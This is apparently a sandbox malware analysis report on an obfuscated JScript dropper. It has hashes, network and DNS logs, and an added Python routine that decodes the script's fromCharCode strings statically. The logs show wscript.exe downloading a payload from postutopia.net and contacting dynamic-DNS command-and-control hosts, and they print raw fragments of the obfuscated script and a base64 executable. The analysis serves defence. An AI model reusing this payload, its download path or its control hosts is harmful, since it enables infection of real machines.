                                                SHA1:ac42e6e8be1c0521aebecebc6b1eb75c75e761fa
                                                SHA256:3eaae1b3f71898ceac37bd6a7779ed9e821d06a1004ff5f527922ae6c9066082
                                                SHA512:36401a2383b0ba998e269201e92f2a1b9b254b1a44027755a8464cfde523f19c8dc1632339aa01501580eba53f75087b389e695a69539dbf418b63de6573ab11
                                                SSDEEP:192:9ngcP7iPwPTkP9A4mx/1DPbnnTBTOSn8nOyvk6BPHBHDSyDhquPdPYlccP0SBPw9:9ngcP7iPwPTkP9A4mx/1DPbnnTBTOSnu
                                                TLSH:D20246C4CD4892F84D073C8A2A9715A35F98D1DECCAA738EC9C7F7950C9FC51C929A82
                                                File Content Preview:var U1s=258393352..var GFDESM = String.fromCharCode(258393468-U1s,258393466-U1s,258393473-U1s,258393475-U1s,258393362-U1s,258393470-U1s,258393449-U1s,258393466-U1s,258393384-U1s,258393431-U1s,258393450-U1s,258393458-U1s,258393453-U1s,258393451-U1s,2583934
                                                Icon Hash:68d69b8bb6aa9a86
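The file content preview above shows how the script hides its strings: a large constant is declared once (var U1s=258393352) and every character is then produced by String.fromCharCode() from a number minus that constant, so no readable keyword sits in the file for signature scanners to match. The decoder below is an added example, not part of the Joe Sandbox report or of the sample; it collects the `var NAME=NUMBER` offsets and evaluates each `String.fromCharCode(N-NAME, ...)` call statically, without running the script. Its input is constructed from the complete terms visible in the preview (the preview is cut off after them); support for plain numeric code points is an assumption the preview does not show.

```python
import re

# Constructed sample: the start of the report's "File Content Preview",
# truncated to the complete fromCharCode terms that are visible there.
SAMPLE = ('var U1s=258393352\r\n'
          'var GFDESM = String.fromCharCode(258393468-U1s,258393466-U1s,258393473-U1s,'
          '258393475-U1s,258393362-U1s,258393470-U1s,258393449-U1s,258393466-U1s,'
          '258393384-U1s,258393431-U1s,258393450-U1s,258393458-U1s,258393453-U1s,'
          '258393451-U1s)')

IDENT = r'[A-Za-z_$][\w$]*'


def constants(source):
    """Collect `var NAME = NUMBER` assignments; these are the subtraction offsets."""
    return {m.group(1): int(m.group(2))
            for m in re.finditer(r'\bvar\s+(' + IDENT + r')\s*=\s*(\d+)', source)}


def decode_fromcharcode(source):
    """Return {variable: decoded string} for every
    `var X = String.fromCharCode(...)` call, resolving `NUMBER-OFFSET` terms
    against the constants found in the same script. Nothing is executed."""
    offsets = constants(source)
    decoded = {}
    call = re.compile(r'var\s+(' + IDENT + r')\s*=\s*String\.fromCharCode\(([^)]*)\)')
    for m in call.finditer(source):
        chars = []
        for term in m.group(2).split(','):
            term = term.strip()
            sub = re.fullmatch(r'(\d+)\s*-\s*(' + IDENT + r')', term)
            if sub:
                code = int(sub.group(1)) - offsets[sub.group(2)]
            else:
                code = int(term)          # assumed: a literal code point
            chars.append(chr(code))
        decoded[m.group(1)] = ''.join(chars)
    return decoded


if __name__ == "__main__":
    for name, text in decode_fromcharcode(SAMPLE).items():
        print(f"{name} = {text!r}")
```

Run on the preview's terms, the decoder turns GFDESM into the opening of the real script ("try{" followed by a newline and "var Objec"), which is what the sandbox's "JScript performs obfuscated calls to suspicious functions" signature is reacting to. Because the arithmetic is resolved from the script's own constant, the same routine works when the malware author changes the offset value between campaigns; it only needs the offset to be declared as a numeric `var` in the same file.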
                                                Timestamp                 Protocol  SID      Message                                      Source Port  Dest Port  Source IP      Dest IP
                                                04/24/24-07:00:34.140261  TCP       2018856  ET TROJAN Windows executable base64 encoded  443          49705      51.254.27.105  192.168.2.8
                                                Timestamp                             Source Port  Dest Port  Source IP       Dest IP
                                                Apr 24, 2024 07:00:32.825963020 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:32.826009989 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:32.826112032 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:32.834708929 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:32.834722996 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:33.467469931 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:33.467700005 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:33.542571068 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:33.542592049 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:33.543732882 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:33.543827057 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:33.546345949 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:33.592153072 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.140377998 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.140512943 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:34.140527010 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.140577078 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:34.449639082 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.449662924 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.449692965 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.449752092 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:34.449769020 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.449815035 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:34.450612068 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.450639009 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.450711966 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:34.450720072 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.450740099 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:34.450758934 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:34.759018898 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.759044886 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.759175062 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:34.759185076 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.759246111 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:34.759691000 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.759705067 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.759758949 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:34.759763002 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.759803057 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:34.760525942 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.760541916 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.760721922 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:34.760725975 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:34.760783911 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.068365097 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.068392992 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.068552971 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.068567038 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.068613052 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.069802999 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.069820881 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.069904089 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.069911957 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.069957018 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.070662975 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.070679903 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.070751905 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.070755959 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.070799112 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.070802927 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.070842981 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.071943045 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.071976900 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.072021008 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.072026014 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.072062016 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.072082996 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.073060989 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.073077917 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.073149920 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.073153973 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.073196888 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.073972940 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.073991060 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.074054003 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.074059010 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.074103117 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.377412081 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.377429962 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.377453089 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.377518892 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.377538919 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.377552032 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.377585888 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.378160954 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.378177881 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.378242970 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.378248930 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.378288984 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.378886938 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.378906965 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.378977060 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.378988981 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.379065037 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.379749060 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.379770041 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.379827976 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.379834890 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.379873991 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.380666018 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.380693913 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.380738020 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.380748034 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.380753040 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.380781889 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.380794048 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.381572962 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.381597996 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.381647110 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.381653070 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.381664991 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.381684065 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.382396936 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.382421970 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.382483006 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.382488012 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.382525921 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.383019924 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.383059978 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.383095980 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.383095980 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:35.383119106 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.383137941 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.383338928 CEST  49705        443        192.168.2.8     51.254.27.105
                                                Apr 24, 2024 07:00:35.383356094 CEST  443          49705      51.254.27.105   192.168.2.8
                                                Apr 24, 2024 07:00:50.701858997 CEST  49708        2703       192.168.2.8     178.73.192.3
                                                Apr 24, 2024 07:00:51.715372086 CEST  49708        2703       192.168.2.8     178.73.192.3
                                                Apr 24, 2024 07:00:53.731019974 CEST  49708        2703       192.168.2.8     178.73.192.3
                                                Apr 24, 2024 07:00:57.746624947 CEST  49708        2703       192.168.2.8     178.73.192.3
                                                Apr 24, 2024 07:01:05.778012037 CEST  49708        2703       192.168.2.8     178.73.192.3
                                                Apr 24, 2024 07:01:16.810688972 CEST  49710        49746      192.168.2.8     178.73.192.3
                                                Apr 24, 2024 07:01:17.825066090 CEST  49710        49746      192.168.2.8     178.73.192.3
                                                Apr 24, 2024 07:01:19.840451002 CEST  49710        49746      192.168.2.8     178.73.192.3
                                                Apr 24, 2024 07:01:23.856062889 CEST  49710        49746      192.168.2.8     178.73.192.3
                                                Apr 24, 2024 07:01:31.871671915 CEST  49710        49746      192.168.2.8     178.73.192.3
                                                Apr 24, 2024 07:01:44.299029112 CEST  49712        6974       192.168.2.8     141.101.134.51
                                                Apr 24, 2024 07:01:45.309206009 CEST  49712        6974       192.168.2.8     141.101.134.51
                                                Apr 24, 2024 07:01:47.309128046 CEST  49712        6974       192.168.2.8     141.101.134.51
                                                Apr 24, 2024 07:01:51.309186935 CEST  49712        6974       192.168.2.8     141.101.134.51
                                                Apr 24, 2024 07:01:59.309192896 CEST  49712        6974       192.168.2.8     141.101.134.51
                                                Apr 24, 2024 07:02:10.328032017 CEST  49713        6974       192.168.2.8     141.101.134.51
                                                Apr 24, 2024 07:02:11.340445995 CEST  49713        6974       192.168.2.8     141.101.134.51
                                                Apr 24, 2024 07:02:13.356081009 CEST  49713        6974       192.168.2.8     141.101.134.51
                                                Apr 24, 2024 07:02:17.371728897 CEST  49713        6974       192.168.2.8     141.101.134.51
                                                Apr 24, 2024 07:02:25.387878895 CEST  49713        6974       192.168.2.8     141.101.134.51
                                                Apr 24, 2024 07:02:36.421996117 CEST  49714        49746      192.168.2.8     141.101.134.51
                                                Apr 24, 2024 07:02:37.434190989 CEST  49714        49746      192.168.2.8     141.101.134.51
                                                Apr 24, 2024 07:02:39.449939013 CEST  49714        49746      192.168.2.8     141.101.134.51
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 24, 2024 07:00:31.946762085 CEST | 61228 | 53 | 192.168.2.8 | 1.1.1.1
Apr 24, 2024 07:00:32.820276976 CEST | 53 | 61228 | 1.1.1.1 | 192.168.2.8
Apr 24, 2024 07:00:50.420084953 CEST | 57278 | 53 | 192.168.2.8 | 1.1.1.1
Apr 24, 2024 07:00:50.698926926 CEST | 53 | 57278 | 1.1.1.1 | 192.168.2.8
Apr 24, 2024 07:01:42.904743910 CEST | 59276 | 53 | 192.168.2.8 | 1.1.1.1
Apr 24, 2024 07:01:43.918864012 CEST | 59276 | 53 | 192.168.2.8 | 1.1.1.1
Apr 24, 2024 07:01:44.298192978 CEST | 53 | 59276 | 1.1.1.1 | 192.168.2.8
Apr 24, 2024 07:01:44.298212051 CEST | 53 | 59276 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 24, 2024 07:00:31.946762085 CEST | 192.168.2.8 | 1.1.1.1 | 0x20e3 | Standard query (0) | postutopia.net | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:00:50.420084953 CEST | 192.168.2.8 | 1.1.1.1 | 0x6674 | Standard query (0) | chongmei33.publicvm.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:01:42.904743910 CEST | 192.168.2.8 | 1.1.1.1 | 0x2c68 | Standard query (0) | chonglee575.duckdns.org | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:01:43.918864012 CEST | 192.168.2.8 | 1.1.1.1 | 0x2c68 | Standard query (0) | chonglee575.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 24, 2024 07:00:32.820276976 CEST | 1.1.1.1 | 192.168.2.8 | 0x20e3 | No error (0) | postutopia.net |  | 51.254.27.105 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:00:50.698926926 CEST | 1.1.1.1 | 192.168.2.8 | 0x6674 | No error (0) | chongmei33.publicvm.com |  | 178.73.192.3 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:01:44.298192978 CEST | 1.1.1.1 | 192.168.2.8 | 0x2c68 | No error (0) | chonglee575.duckdns.org |  | 141.101.134.51 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 07:01:44.298212051 CEST | 1.1.1.1 | 192.168.2.8 | 0x2c68 | No error (0) | chonglee575.duckdns.org |  | 141.101.134.51 | A (IP address) | IN (0x0001) | false
• postutopia.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 51.254.27.105 | 443 | 7492 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-24 05:00:33 UTC | 350 | OUT | GET /wp-includes/images/smilies/wp.js HTTP/1.1
Accept: */*
Accept-Language: en-ch
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: postutopia.net
Connection: Keep-Alive
2024-04-24 05:00:34 UTC | 455 | IN | HTTP/1.1 200 OK
Connection: close
content-type: application/octet-stream
last-modified: Tue, 23 Apr 2024 00:08:36 GMT
accept-ranges: bytes
content-length: 305955
date: Wed, 24 Apr 2024 05:00:33 GMT
server: LiteSpeed
vary: User-Agent
content-disposition: attachment
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                2024-04-24 05:00:34 UTC913INData Raw: 78 4c 70 6c 51 4f 6e 70 45 6e 5a 41 64 54 6c 20 3d 20 22 22 20 0d 0a 53 4f 75 77 7a 41 65 79 75 46 6a 59 63 20 3d 20 31 39 31 3b 0d 0a 76 61 72 20 69 69 45 44 48 74 47 4f 46 46 65 78 67 4a 63 46 4d 20 3d 20 22 4f 68 59 73 6b 6d 62 4f 50 4c 71 6a 57 4e 49 77 65 77 50 66 4f 5a 53 22 3b 0d 0a 50 42 4e 4a 51 79 54 72 42 73 69 72 42 7a 6a 79 77 20 3d 20 31 36 3b 0d 0a 76 61 72 20 64 70 72 69 51 66 69 72 56 42 42 4d 4e 61 78 6f 50 4a 71 58 64 4b 50 77 55 6f 71 6f 56 47 77 76 79 54 42 5a 68 6b 7a 57 65 52 76 78 52 65 6f 52 6c 43 6d 71 73 62 53 53 5a 75 4e 62 6f 75 56 50 45 47 4f 20 3d 20 22 75 5a 58 48 66 4a 55 73 4d 50 53 66 71 41 5a 43 54 55 46 43 58 41 69 7a 6d 57 58 69 6b 76 67 73 4b 51 74 73 4e 76 48 67 59 6a 47 44 48 50 58 62 4f 72 43 75 7a 45 71 74 71 59
                                                Data Ascii: xLplQOnpEnZAdTl = "" SOuwzAeyuFjYc = 191;var iiEDHtGOFFexgJcFM = "OhYskmbOPLqjWNIwewPfOZS";PBNJQyTrBsirBzjyw = 16;var dpriQfirVBBMNaxoPJqXdKPwUoqoVGwvyTBZhkzWeRvxReoRlCmqsbSSZuNbouVPEGO = "uZXHfJUsMPSfqAZCTUFCXAizmWXikvgsKQtsNvHgYjGDHPXbOrCuzEqtqY
                                                2024-04-24 05:00:34 UTC14994INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 44 41 73 51 45 41 48 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4b 41 4e 41 67 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 73 41 45 41 68 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 35 30 5a 58 68 30 41 41 41 41 47 4a 63 42 41 41 41 51 41 41 41 41 6d 41 45 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 41 47 41 75 63 6d 52 68 64 47 45 41 41 4c 52 74 41 41 41 41 73 41 45 41 41 47 34 41 41 41 43 63 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 42 41 4c 6d 52 68 64 47 45 41 41 41 44 41 4d 41 41 41 41 43 41 43 41 41 41
                                                Data Ascii: AAAAAAAAAAAAAAAAAADAsQEAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKANAgBAAAAAAAAAAAAAAAAAsAEAhAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAGJcBAAAQAAAAmAEAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAALRtAAAAsAEAAG4AAACcAQAAAAAAAAAAAAAAAABAAABALmRhdGEAAADAMAAAACACAAA
                                                2024-04-24 05:00:34 UTC16384INData Raw: 45 41 55 31 62 2f 30 49 50 45 43 49 50 34 41 6e 51 46 67 2f 67 44 64 51 66 48 52 67 53 61 41 67 41 41 68 63 41 50 68 44 67 42 41 41 43 44 2b 41 49 50 68 43 38 42 41 41 41 37 78 58 56 57 4f 39 31 31 43 31 62 6f 77 47 34 41 41 49 50 45 42 4f 73 32 61 67 42 71 41 47 6f 41 56 75 67 50 62 67 41 41 67 38 51 51 67 2f 73 44 64 53 4b 4c 54 6b 79 4c 56 6b 51 7a 77 47 61 4a 52 45 72 2b 69 30 35 4d 6a 56 51 4a 2f 6c 4a 51 69 30 5a 45 55 4f 68 59 67 41 41 41 67 38 51 4d 69 38 66 6f 33 76 6a 2f 2f 34 4e 2f 45 41 41 50 68 50 4c 2b 2f 2f 2b 44 2b 77 51 50 68 66 44 2b 2f 2f 2b 4c 52 68 69 46 77 48 38 48 69 38 56 64 57 31 39 65 77 34 50 34 41 67 2b 46 67 51 41 41 41 49 74 57 46 49 70 48 4d 49 74 4f 43 49 67 45 45 51 46 75 46 41 2b 32 56 7a 47 4c 52 68 53 4c 54 67 69 49 46
                                                Data Ascii: EAU1b/0IPECIP4AnQFg/gDdQfHRgSaAgAAhcAPhDgBAACD+AIPhC8BAAA7xXVWO911C1bowG4AAIPEBOs2agBqAGoAVugPbgAAg8QQg/sDdSKLTkyLVkQzwGaJREr+i05MjVQJ/lJQi0ZEUOhYgAAAg8QMi8fo3vj//4N/EAAPhPL+//+D+wQPhfD+//+LRhiFwH8Hi8VdW19ew4P4Ag+FgQAAAItWFIpHMItOCIgEEQFuFA+2VzGLRhSLTgiIF
                                                2024-04-24 05:00:34 UTC16384INData Raw: 53 4e 52 43 51 51 55 46 48 2f 56 43 51 34 69 2b 69 44 78 41 69 46 37 51 2b 45 54 77 49 41 41 49 74 45 4a 42 41 50 74 68 42 41 69 55 51 6b 45 49 76 4f 30 2b 4b 4c 54 31 69 34 41 51 41 41 41 4e 50 67 69 30 39 51 41 39 71 44 78 67 68 49 49 38 4f 4c 42 49 47 4c 30 4d 48 71 43 41 2b 32 79 6b 30 37 7a 6e 65 73 71 50 41 50 68 62 6f 41 41 41 43 4c 79 4d 48 70 43 41 2b 32 30 59 6c 4d 4a 43 53 4a 56 43 51 67 44 37 62 49 41 38 71 36 41 51 41 41 41 4e 50 69 69 30 77 6b 49 49 6c 45 4a 42 7a 42 36 42 42 4b 49 39 50 54 36 67 50 51 69 30 64 51 69 77 53 51 69 38 6a 42 36 51 67 50 74 74 45 50 74 6b 77 6b 4a 41 50 52 4f 39 5a 32 61 6f 58 74 64 52 75 4c 52 43 51 30 6a 56 51 6b 45 46 4a 51 2f 31 51 6b 4f 49 76 6f 67 38 51 49 68 65 30 50 68 4b 77 42 41 41 43 4c 52 43 51 51 44
                                                Data Ascii: SNRCQQUFH/VCQ4i+iDxAiF7Q+ETwIAAItEJBAPthBAiUQkEIvO0+KLT1i4AQAAANPgi09QA9qDxghII8OLBIGL0MHqCA+2yk07znesqPAPhboAAACLyMHpCA+20YlMJCSJVCQgD7bIA8q6AQAAANPii0wkIIlEJBzB6BBKI9PT6gPQi0dQiwSQi8jB6QgPttEPtkwkJAPRO9Z2aoXtdRuLRCQ0jVQkEFJQ/1QkOIvog8QIhe0PhKwBAACLRCQQD
                                                2024-04-24 05:00:34 UTC16384INData Raw: 59 4b 41 41 41 72 33 7a 76 4c 69 58 77 6b 48 48 35 61 44 37 65 77 78 41 6f 41 41 49 76 2b 30 2b 65 4c 53 41 68 6d 43 62 69 34 46 67 41 41 44 37 61 59 75 42 59 41 41 49 74 34 46 49 67 63 4f 51 46 6f 46 41 2b 32 6d 4c 6b 57 41 41 43 4c 53 41 69 4c 65 42 53 49 48 41 2b 4c 6d 4c 77 57 41 41 41 42 61 42 53 78 45 43 72 4c 5a 74 50 75 69 30 77 6b 48 49 31 4d 43 2f 42 6d 69 62 43 34 46 67 41 41 69 33 51 6b 45 4f 73 58 5a 6f 75 34 78 41 6f 41 41 47 62 54 35 32 59 4a 75 4c 67 57 41 41 43 4c 66 43 51 63 41 38 2b 44 78 76 57 44 2b 51 6d 4a 69 4c 77 57 41 41 42 2b 55 49 76 2b 30 2b 65 4c 53 41 68 6d 43 62 69 34 46 67 41 41 44 37 61 59 75 42 59 41 41 49 74 34 46 49 67 63 4f 51 46 6f 46 41 2b 32 6d 4c 6b 57 41 41 43 4c 65 42 53 4c 53 41 69 49 48 41 2b 4c 6d 4c 77 57 41
                                                Data Ascii: YKAAAr3zvLiXwkHH5aD7ewxAoAAIv+0+eLSAhmCbi4FgAAD7aYuBYAAIt4FIgcOQFoFA+2mLkWAACLSAiLeBSIHA+LmLwWAAABaBSxECrLZtPui0wkHI1MC/BmibC4FgAAi3QkEOsXZou4xAoAAGbT52YJuLgWAACLfCQcA8+DxvWD+QmJiLwWAAB+UIv+0+eLSAhmCbi4FgAAD7aYuBYAAIt4FIgcOQFoFA+2mLkWAACLeBSLSAiIHA+LmLwWA
